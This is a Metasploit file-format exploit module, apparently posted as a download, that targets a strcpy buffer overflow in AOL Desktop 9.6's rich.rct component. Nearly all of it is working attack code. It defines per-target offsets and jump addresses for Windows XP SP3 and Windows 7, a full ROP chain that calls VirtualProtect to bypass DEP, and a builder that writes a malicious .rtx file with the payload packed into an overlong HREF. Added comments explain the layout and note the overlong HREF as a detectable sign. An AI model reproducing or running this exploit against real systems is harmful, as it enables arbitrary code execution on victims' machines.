
AOL Desktop 9.6 .rtx file parsing buffer overflow vulnerability download
##
# $Id: aol_desktop_linktag.rb 13967 2011-10-17 03:49:49Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
        # File-format exploit module: `exploit` writes a single .rtx file whose
        # <A HREF="..."> attribute value is an oversized string (every target's
        # 'Max' is 8000 bytes). Nothing happens on the wire; the file has to be
        # opened by AOL Desktop 9.6.
        #
        # Defensive notes, derived from the layout built in `exploit`:
        #   - Observable artifact: an .rtx/HTML anchor whose HREF value is
        #     thousands of bytes long, far beyond any legitimate hyperlink.
        #   - The NX-bypass target is built entirely from hard-coded addresses in
        #     AOL-shipped modules (appdata.dll, mip.tol, abook.dll, manager.dll,
        #     imfdecode.rct, www.tol) plus a fixed kernel32 VirtualProtect()
        #     address, so it presumably only works where those modules load at
        #     fixed addresses — DEP alone is not a complete mitigation here.
        Rank = NormalRanking

        # Supplies file_create / FILENAME handling (see the end of `exploit`).
        include Msf::Exploit::FILEFORMAT

        # Module metadata. Points worth knowing before editing:
        #   'BadChars' — bytes the encoded payload must avoid. \x3e is '>' and
        #     \x0d/\x0a are CR/LF; presumably excluded because the payload is
        #     embedded inside an HTML attribute value (see `exploit`).
        #   'Targets'  — each target carries 'Offset' (distance to the overwritten
        #     return address, or to the ROP pivot for the NX-bypass target) and
        #     'Max' (final length of the HREF string). Only the NX-bypass target
        #     also carries 'vp', the VirtualProtect() address consumed by the ROP
        #     chain in `exploit`.
        #   Target names are matched by regex in `exploit`; a renamed or added
        #   target must still match exactly one branch there.
        #
        # @param info [Hash] overrides merged via update_info
        def initialize(info={})
                super(update_info(info,
                        'Name'           => "AOL Desktop 9.6 RTX Buffer Overflow",
                        'Description'    => %q{
                                        This module exploits a vulnerability found in AOL Desktop 9.6's Tool\rich.rct
                                component. By supplying a long string of data in the hyperlink tag, rich.rct copies
                                this data into a buffer using a strcpy function, which causes an overflow, and
                                results arbitrary code execution.
                        },
                        'License'            => MSF_LICENSE,
                        'Version'            => "$Revision: 13967 $",
                        'Author'         =>
                                [
                                        'sup3r',        #Initial disclosure, poc (9.5)
                                        'sickn3ss',     #9.6 poc
                                        'sinn3r',       #Metasploit
                                        'mr_me',        #NX bypass target
                                        'silent_dream', #Win 7 target
                                ],
                        'References'     =>
                                [
                                        [ 'OSVDB', '70741'],
                                        [ 'URL', 'http://www.exploit-db.com/exploits/16085/' ],
                                ],
                        'Payload'            =>
                                {
                                        'Space'           => 400,
                                        # \x3e = '>' (would close the <A> tag), \x0d\x0a = CR/LF
                                        'BadChars'        => "\x00\x0d\x0a\x3e\x7f",
                                        'StackAdjustment' => -3500,
                                },
                        'DefaultOptions' =>
                                {
                                        'ExitFunction' => "process",
                                },
                        'Platform'       => 'win',
                        'Targets'            =>
                                [
                                        [
                                                # Matched by /XP SP3$/ in `exploit`
                                                'AOL Desktop 9.6 on Windows XP SP3',
                                                {
                                                        'Ret'   => 0x01DB4542,  #0x01DB4542 JMP ESI
                                                        'Offset'=> 5391,        #Offset to EIP
                                                        'Max'   => 8000,        #Buffer max. Can be more.
                                                },
                                        ],
                                        [
                                                # Matched by /SP3 - NX bypass$/ in `exploit`
                                                'AOL Desktop 9.6 on Windows XP SP3 - NX bypass',
                                                {
                                                        'Ret'    => 0x6C02D216,  # PUSH ESI, POP ESP, POP ESI, POP EDI, POP EDI, RETN 8
                                                        'vp'     => 0x7C801AD4,  # (kernel32.dll) => VirtualProtect() -- fixed address, only this target uses it
                                                        'Offset' => 5368,        # offset to rop
                                                        'Max'    => 8000,        # Buffer max. Can be more.
                                                },
                                        ],
                                        [
                                                # Matched by /Windows 7/ in `exploit`
                                                'AOL Desktop 9.6 on Windows 7',
                                                {
                                                        'Ret'    => 0x63227D6D,  # JMP ESP in coolapi.dll
                                                        'Offset' => 4327,        # Offset to EIP
                                                        'Max'    => 8000,        # Buffer max. Can be more
                                                }
                                        ],
                                ],
                        'Privileged'     => false,
                        'DisclosureDate' => "Jan 31 2011",
                        'DefaultTarget'  => 0))

                        # FILENAME is read back via datastore['FILENAME'] in `exploit`
                        register_options(
                                [
                                        OptString.new( 'FILENAME', [false, 'The filename', 'msf.rtx'] ),
                                ]
                        )
        end


        # Builds the per-target HREF string, wraps it in a minimal HTML document
        # and writes it with file_create.
        #
        # Branch selection is by target name. Each of the three names declared in
        # `initialize` matches exactly one regex below (the first is anchored on
        # "XP SP3$", so it does not also match the "... - NX bypass" name).
        # NOTE(review): a target name matching none of the branches would leave
        # `sploit` nil, and "#{sploit}" would then silently emit an empty HREF —
        # worth a guard if targets are ever added.
        #
        # Every branch finishes by padding with rand_text_alpha up to
        # target['Max'], so (assuming the earlier pieces fit) the HREF value is
        # always exactly 'Max' bytes long regardless of target.
        def exploit

                if target.name =~ /XP SP3$/

                        # Compatible with what the poc has, and what I see on my debugger
                        #
                        # Layout, per the author's offsets: filler, first payload copy,
                        # pad to 5368, NOP sled, 5-byte near JMP back into that copy,
                        # target.ret, NOPs up to Offset-2, a 2-byte short jump, then
                        # target.ret at 'Offset' (the "Offset to EIP" above), a second
                        # payload copy, and padding to 'Max'.
                        sploit  = ''
                        sploit << rand_text_alpha(4968+7)
                        sploit << payload.encoded
                        sploit << rand_text_alpha(5368-sploit.length)
                        sploit << make_nops(11)
                        sploit << "\xe9\x70\xfe\xff\xff"  #JMP back 400 bytes (rel32 = -0x190)
                        sploit << [target.ret].pack('V')
                        sploit << make_nops(target['Offset']-sploit.length-2)
                        sploit << "\xeb\x04"              # short jump over the 4-byte ret that follows
                        sploit << [target.ret].pack('V')  # sits at target['Offset']
                        sploit << payload.encoded
                        sploit << rand_text_alpha(target['Max']-sploit.length)

                elsif target.name =~ /SP3 - NX bypass$/

                        #Thanks mr_me for the ROP chain
                        #
                        # The chain below is pure hard-coded addresses (see the module
                        # names in the comments) ending in a VirtualProtect() call at
                        # target['vp']; gadget bytes are little-endian dwords, so e.g.
                        # "\x66\x21\x5c\x63" is 0x635C2166.

                        rop = ''
                        # This is the start of ESI
                        rop << rand_text_alpha(4) # junk - > POP ESI
                        rop << rand_text_alpha(4) # junk - > POP EDI
                        rop << rand_text_alpha(4) # junk - > POP EDI
                        rop << "\x66\x21\x5c\x63" # 0x635C2166 (appdata.dll) => POP ECX; RETN

                        # Take control of the stack pointer right here (EIP)
                        rop << [target.ret].pack('V') # junk - > RET 8 on the EIP pointer
                        rop << rand_text_alpha(4) # junk - > RET 8 on the EIP pointer

                        # Arg 4 of VirtualProtect() -> lpflOldProtect
                        rop << "\x4c\x4b\x0e\x69" # 0x690E4B4C => RW addr -----------^^

                        # Arg 2 of VirtualProtect() -> dwSize (0x212C) & setup EAX
                        rop << "\xf3\xdf\x4b\x67" # 0x674BDFF3 (mip.tol) => XCHG EAX,EBX; RETN
                        rop << "\xfd\xc6\xb0\x6b" # 0x6BB0C6FD (imfdecode.rct) => MOV EAX,212C; POP EBX; RETN
                        rop << rand_text_alpha(4) # junk -------------------------------------------^^
                        rop << "\xf3\xdf\x4b\x67" # 0x674BDFF3 (mip.tol) => XCHG EAX,EBX; RETN

                        # Arg 3 of VirtualProtect() -> flNewProtect (PAGE_EXECUTE_READWRITE)
                        rop << "\xbb\x07\x98\x64" # 0x649807BB (abook.dll) => XCHG EAX,EDX; RETN
                        rop << "\x9e\xe4\xc6\x68" # 0x68C6E49E (www.tol) ======> ADD EAX,10; POP EBP; RETN 4
                        rop << rand_text_alpha(4) # junk --------------------------------------^^
                        rop << "\xbb\x07\x98\x64" # 0x649807BB (abook.dll; same bytes as the gadget above -- original comment said "ebook.dll") => XCHG EAX,EDX; RETN
                        rop << rand_text_alpha(4) # junk ----------------------------------------------^^

                        # Arg 1 of VirtualProtect() -> return address & lpAddress
                        # Also, setup call to VirtualProtect() ptr in ESI
                        rop << "\x3f\x7b\x1e\x67" # 0x671E7B3F (manager.dll) => PUSH ESP; POP EBP; RETN
                        rop << "\x2c\x10\x49\x67" # 0x6749102C (mip.tol) => XCHG EAX,EBP; RETN  (address in comment corrected to match the bytes; cf. the same gadget below)
                        rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) => ADD EAX,0C; POP ESI; RETN
                        rop << rand_text_alpha(4) # junk ---------------------------------^^
                        rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) => ADD EAX,0C; POP ESI; RETN
                        rop << rand_text_alpha(4) # junk ---------------------------------^^
                        rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) => ADD EAX,0C; POP ESI; RETN
                        rop << rand_text_alpha(4) # junk ---------------------------------^^
                        rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) => ADD EAX,0C; POP ESI; RETN
                        rop << rand_text_alpha(4) # junk ---------------------------------^^
                        rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) ===========> ADD EAX,0C; POP ESI; RETN
                        rop << [target['vp']].pack('V') # VirtualProtect() ----------------------------^^
                        rop << "\x2c\x10\x49\x67" # 0x6749102C (mip.tol) => XCHG EAX,EBP; RETN

                        # Continue safely, rop nop
                        rop << "\xdb\x22\x94\x64" # 0x649422DB (manager.dll) ======> POP EDI; RETN
                        rop << "\xdc\x22\x94\x64" # 0x649422DC (abook.dll) => RETN ----^^  (adjacent byte of the gadget above, so one of the two module labels is off -- verify)

                        # gently place our code on the stack
                        rop << "\x7e\x38\xa0\x60" # 0x60A0387E (abook.dll) ===> PUSHAD; RETN

                        sploit = rand_text_alpha(target['Offset']-602) #688 was the original

                        #mr_me's offset
                        # The (rop, NOPs, payload) triple is emitted twice, 7 bytes apart;
                        # the author does not say why, so treat the duplication as
                        # intentional rather than simplifying it.
                        sploit << rop
                        sploit << make_nops(74)
                        sploit << payload.encoded

                        #padding to the next offset
                        sploit << rand_text_alpha(7)

                        #the next offset
                        sploit << rop
                        sploit << make_nops(74)
                        sploit << payload.encoded

                        #Padding
                        sploit << rand_text_alpha(target['Max']-sploit.length)

                elsif target.name =~ /Windows 7/

                        #Thanks silent_dream
                        #
                        # Layout: filler to Offset-16, a 2-byte short jump, 14 NOPs,
                        # target.ret (at 'Offset'), 15 NOPs, payload, padding to 'Max'.

                        sploit  = ''
                        sploit << rand_text_alpha(target['Offset']-2-14)
                        sploit << "\xeb\x13"              # short jump forward (+0x13) past the NOPs and ret
                        sploit << make_nops(14)
                        sploit << [target.ret].pack('V')  # sits at target['Offset']
                        sploit << make_nops(15)
                        sploit << payload.encoded
                        sploit << rand_text_alpha(target['Max'] - sploit.length)

                end

                # Visible link text only; the overlong HREF attribute is the payload carrier.
                link_value = rand_text_alpha(6)

                rtx  = "<HTML>"
                rtx << "<A HREF=\"#{sploit}\">#{link_value}</A>"
                rtx << "</HTML>"

                # FILENAME defaults to msf.rtx (see register_options in `initialize`)
                print_status("Creating #{datastore['FILENAME']}...")
                file_create(rtx)
        end
end